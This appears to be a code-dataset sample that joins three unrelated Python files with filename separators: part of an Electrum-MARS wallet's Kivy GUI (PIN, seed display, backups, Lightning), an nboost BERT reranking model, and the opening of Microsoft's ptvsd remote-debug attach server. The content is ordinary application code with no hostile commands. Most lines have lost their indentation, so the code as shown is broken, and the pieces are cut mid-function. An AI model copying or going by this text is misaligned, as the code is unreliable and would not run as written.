popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the basic
        tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_mars.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_mars.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_mars_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_mars_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-mars.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
        # The main view of the activity might not have focus,
        # in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_mars.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return self.electrum_config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
# FIXME this is using format_satoshis_plain instead of config.format_amount
# as we sometimes convert the returned string back to numbers,
# via self.get_amount()... the need for converting back should be removed
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_amount_and_units_with_fiat(self, x) -> str:
text = self.format_amount_and_units(x)
fiat = self.fx.format_amount_and_units(x) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-MARS', message,
app_icon=icon, app_name='Electrum-MARS')
except ImportError:
            self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
backup_dir = util.android_backup_dir()
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
__init__.py
|
from threading import Thread
from typing import List
import tensorflow as tf
from queue import Queue
import numpy as np
from nboost.model.bert_model import modeling, tokenization
from nboost.model.base import BaseModel
class BertModel(BaseModel):
def __init__(self, verbose=False, **kwargs):
super().__init__(**kwargs)
self.download()
self.output_q = Queue()
self.input_q = Queue()
ckpts = list(self.model_dir.glob('*.ckpt*'))
if not len(ckpts) > 0:
raise FileNotFoundError("Tensorflow model not found")
self.checkpoint = str(ckpts[0]).split('.ckpt')[0] + '.ckpt'
self.vocab_file = str(self.model_dir.joinpath('vocab.txt'))
self.bert_config_file = str(self.model_dir.joinpath('bert_config.json'))
if not verbose:
tf.logging.set_verbosity(tf.logging.ERROR)
self.model_thread = Thread(target=self.run_model)
self.model_thread.start()
@staticmethod
def create_model(bert_config, input_ids, input_mask, segment_ids,
labels, num_labels):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=False,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=False)
output_layer = model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [num_labels, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [num_labels], initializer=tf.zeros_initializer())
with tf.variable_scope("loss"):
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def model_fn_builder(self, bert_config, num_labels, init_checkpoint):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
label_ids = features["label_ids"]
(total_loss, per_example_loss, log_probs) = self.create_model(
bert_config, input_ids, input_mask, segment_ids, label_ids,
num_labels)
tvars = tf.trainable_variables()
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
predictions={
"log_probs": log_probs,
"label_ids": label_ids,
})
return output_spec
return model_fn
def input_fn(self):
"""The actual input function."""
output_types = {
"input_ids": tf.int32,
"segment_ids": tf.int32,
"input_mask": tf.int32,
"label_ids": tf.int32,
}
dataset = tf.data.Dataset.from_generator(self.feature_generator, output_types)
dataset = dataset.padded_batch(
batch_size=self.batch_size,
padded_shapes={
"input_ids": [self.max_seq_len],
"segment_ids": [self.max_seq_len],
"input_mask": [self.max_seq_len],
"label_ids": [],
},
padding_values={
"input_ids": 0,
"segment_ids": 0,
"input_mask": 0,
"label_ids": 0,
},
drop_remainder=True)
return dataset
def run_model(self):
bert_config = modeling.BertConfig.from_json_file(self.bert_config_file)
assert self.max_seq_len <= bert_config.max_position_embeddings
run_config = tf.estimator.RunConfig(model_dir=str(self.data_dir))
model_fn = self.model_fn_builder(
bert_config=bert_config,
num_labels=2,
init_checkpoint=self.checkpoint)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
config=run_config)
result = estimator.predict(input_fn=self.input_fn,
yield_single_examples=True)
for item in result:
self.output_q.put((item["log_probs"], item["label_ids"]))
def feature_generator(self):
tokenizer = tokenization.FullTokenizer(vocab_file=self.vocab_file, do_lower_case=True)
while True:
            item = self.input_q.get()
            if not item:
                break
            query, candidates = item
query = tokenization.convert_to_unicode(query)
query_token_ids = tokenization.convert_to_bert_input(
text=query, max_seq_length=self.max_seq_len, tokenizer=tokenizer,
add_cls=True)
for i, doc_text in enumerate(candidates):
doc_token_id = tokenization.convert_to_bert_input(
text=tokenization.convert_to_unicode(doc_text),
max_seq_length=self.max_seq_len - len(query_token_ids),
tokenizer=tokenizer,
add_cls=False)
query_ids = query_token_ids
doc_ids = doc_token_id
input_ids = query_ids + doc_ids
query_segment_id = [0] * len(query_ids)
doc_segment_id = [1] * len(doc_ids)
segment_ids = query_segment_id + doc_segment_id
input_mask = [1] * len(input_ids)
features = {
"input_ids": input_ids,
"segment_ids": segment_ids,
"input_mask": input_mask,
"label_ids": 0
}
yield features
    def pad(self, candidates):
        # pad the candidate list up to a multiple of the batch size,
        # returning a new list so the caller's list is not mutated
        remainder = len(candidates) % self.batch_size
        if remainder == 0:
            return list(candidates)
        return list(candidates) + ['PADDING DOC'] * (self.batch_size - remainder)
def rank(self, query: bytes, choices: List[bytes]) -> List[int]:
actual_length = len(choices)
candidates = self.pad(choices)
        self.input_q.put((query, candidates))
results = [self.output_q.get() for _ in range(len(candidates))][:actual_length]
log_probs, labels = zip(*results)
log_probs = np.stack(log_probs).reshape(-1, 2)
scores = log_probs[:, 1]
assert len(scores) == actual_length
return scores.argsort()[::-1]
def close(self):
self.input_q.put(None)
self.model_thread.join()
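# Illustrative sketch (not part of the original class): how the post-processing in
# rank() turns per-candidate two-class log-probabilities into a ranking. The scores
# below are made-up values; column 1 is treated as the "relevant" class, and a
# descending argsort yields candidate indices from most to least relevant.
def _example_rank_postprocessing():
    import numpy as np
    log_probs = np.array([[-0.9, -0.5],    # candidate 0
                          [-0.1, -2.4],    # candidate 1
                          [-1.6, -0.2]])   # candidate 2
    scores = log_probs[:, 1]               # log P(relevant) for each candidate
    ranking = scores.argsort()[::-1]       # highest score first
    return ranking                         # array([2, 0, 1])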
|
attach_server.py
|
# Python Tools for Visual Studio
# Copyright(c) Microsoft Corporation
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the License); you may not use
# this file except in compliance with the License. You may obtain a copy of the
# License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY
# IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
__author__ = "Microsoft Corporation <ptvshelp@microsoft.com>"
__version__ = "3.0.0.0"
__all__ = ['enable_attach', 'wait_for_attach', 'break_into_debugger', 'settrace', 'is_attached', 'AttachAlreadyEnabledError']
import atexit
import getpass
import os
import os.path
import platform
import socket
import struct
import sys
import threading
try:
import thread
except ImportError:
import _thread as thread
try:
import ssl
except ImportError:
ssl = None
import ptvsd.visualstudio_py_debugger as vspd
import ptvsd.visualstudio_py_repl as vspr
from ptvsd.visualstudio_py_util import to_bytes, read_bytes, read_int, read_string, write_bytes, write_int, write_string
# The server (i.e. the Python app) waits on the provided TCP port. Whenever anything connects to that port,
# it immediately sends the octet sequence 'PTVSDBG', followed by the version number represented as an int64,
# and then waits for the client to respond with the same exact byte sequence. After signatures are thereby
# exchanged and found to match, the client is expected to provide a string secret (in the usual debugger
# string format, None/ASCII/Unicode prefix + length + data), which can be an empty string to designate the
# lack of a specified secret.
#
# If the secret does not match the one expected by the server, it responds with 'RJCT', and then closes
# the connection. Otherwise, the server responds with 'ACPT', and awaits a 4-octet command. The following
# commands are recognized:
#
# 'INFO'
# Report information about the process. The server responds with the following information, in order:
# - Process ID (int64)
# - Executable name (string)
# - User name (string)
# - Implementation name (string)
# and then immediately closes connection. Note, all string fields can be empty or null strings.
#
# 'ATCH'
# Attach debugger to the process. If successful, the server responds with 'ACPT', followed by process ID
# (int64), and then the Python language version that the server is running represented by three int64s -
# major, minor, micro; From there on the socket is assumed to be using the normal PTVS debugging protocol.
# If attaching was not successful (which can happen if some other debugger is already attached), the server
# responds with 'RJCT' and closes the connection.
#
# 'REPL'
# Attach REPL to the process. If successful, the server responds with 'ACPT', and from there on the socket
# is assumed to be using the normal PTVS REPL protocol. If not successful (which can happen if there is
# no debugger attached), the server responds with 'RJCT' and closes the connection.
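# Illustrative sketch (not part of the original module): the initial signature exchange
# described above, as seen from a client. Only the 'PTVSDBG' + version handshake is
# shown; the secret and command phases use the debugger string wire format
# (read_string/write_string) and are omitted here. Host and port are placeholders.
def _example_signature_exchange(host='127.0.0.1', port=5678):
    conn = socket.create_connection((host, port))
    try:
        banner = read_bytes(conn, 7)    # expect b'PTVSDBG'
        version = read_int(conn)        # protocol version as int64
        write_bytes(conn, banner)       # echo the exact same signature back
        write_int(conn, version)
        return banner, version
    finally:
        conn.close()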
PTVS_VER = '2.2'
DEFAULT_PORT = 5678
PTVSDBG_VER = 6 # must be kept in sync with DebuggerProtocolVersion in PythonRemoteProcess.cs
PTVSDBG = to_bytes('PTVSDBG')
ACPT = to_bytes('ACPT')
RJCT = to_bytes('RJCT')
INFO = to_bytes('INFO')
ATCH = to_bytes('ATCH')
REPL = to_bytes('REPL')
_attach_enabled = False
_attached = threading.Event()
vspd.DONT_DEBUG.append(os.path.normcase(__file__))
class AttachAlreadyEnabledError(Exception):
"""`ptvsd.enable_attach` has already been called in this process."""
def enable_attach(secret, address = ('0.0.0.0', DEFAULT_PORT), certfile = None, keyfile = None, redirect_output = True):
"""Enables Python Tools for Visual Studio to attach to this process remotely
to debug Python code.
Parameters
----------
secret : str
Used to validate the clients - only those clients providing the valid
secret will be allowed to connect to this server. On client side, the
secret is prepended to the Qualifier string, separated from the
hostname by ``'@'``, e.g.: ``'secret@myhost.cloudapp.net:5678'``. If
secret is ``None``, there's no validation, and any client can connect
freely.
address : (str, int), optional
Specifies the interface and port on which the debugging server should
listen for TCP connections. It is in the same format as used for
regular sockets of the `socket.AF_INET` family, i.e. a tuple of
``(hostname, port)``. On client side, the server is identified by the
Qualifier string in the usual ``'hostname:port'`` format, e.g.:
``'myhost.cloudapp.net:5678'``. Default is ``('0.0.0.0', 5678)``.
certfile : str, optional
Used to enable SSL. If not specified, or if set to ``None``, the
connection between this program and the debugger will be unsecure,
and can be intercepted on the wire. If specified, the meaning of this
parameter is the same as for `ssl.wrap_socket`.
keyfile : str, optional
Used together with `certfile` when SSL is enabled. Its meaning is the
same as for ``ssl.wrap_socket``.
redirect_output : bool, optional
Specifies whether any output (on both `stdout` and `stderr`) produced
by this program should be sent to the debugger. Default is ``True``.
Notes
-----
This function returns immediately after setting up the debugging server,
and does not block program execution. If you need to block until debugger
is attached, call `ptvsd.wait_for_attach`. The debugger can be detached
and re-attached multiple times after `enable_attach` is called.
This function can only be called once during the lifetime of the process.
On a second call, `AttachAlreadyEnabledError` is raised. In circumstances
where the caller does not control how many times the function will be
called (e.g. when a script with a single call is run more than once by
a hosting app or framework), the call should be wrapped in ``try..except``.
Only the thread on which this function is called, and any threads that are
created after it returns, will be visible in the debugger once it is
attached. Any threads that are already running before this function is
called will not be visible.
"""
if not ssl and (certfile or keyfile):
raise ValueError('could not import the ssl module - SSL is not supported on this version of Python')
if sys.platform == 'cli':
# Check that IronPython was launched with -X:Frames and -X:Tracing, since we can't register our trace
# func on the thread that calls enable_attach otherwise
import clr
x_tracing = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Tracing
x_frames = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Frames
if not x_tracing or not x_frames:
raise RuntimeError('IronPython must be started with -X:Tracing and -X:Frames options to support PTVS remote debugging.')
global _attach_enabled
if _attach_enabled:
raise AttachAlreadyEnabledError('ptvsd.enable_attach() has already been called in this process.')
_attach_enabled = True
atexit.register(vspd.detach_process_and_notify_debugger)
server = socket.socket(proto=socket.IPPROTO_TCP)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(address)
server.listen(1)
def server_thread_func():
while True:
client = None
raw_client = None
try:
client, addr = server.accept()
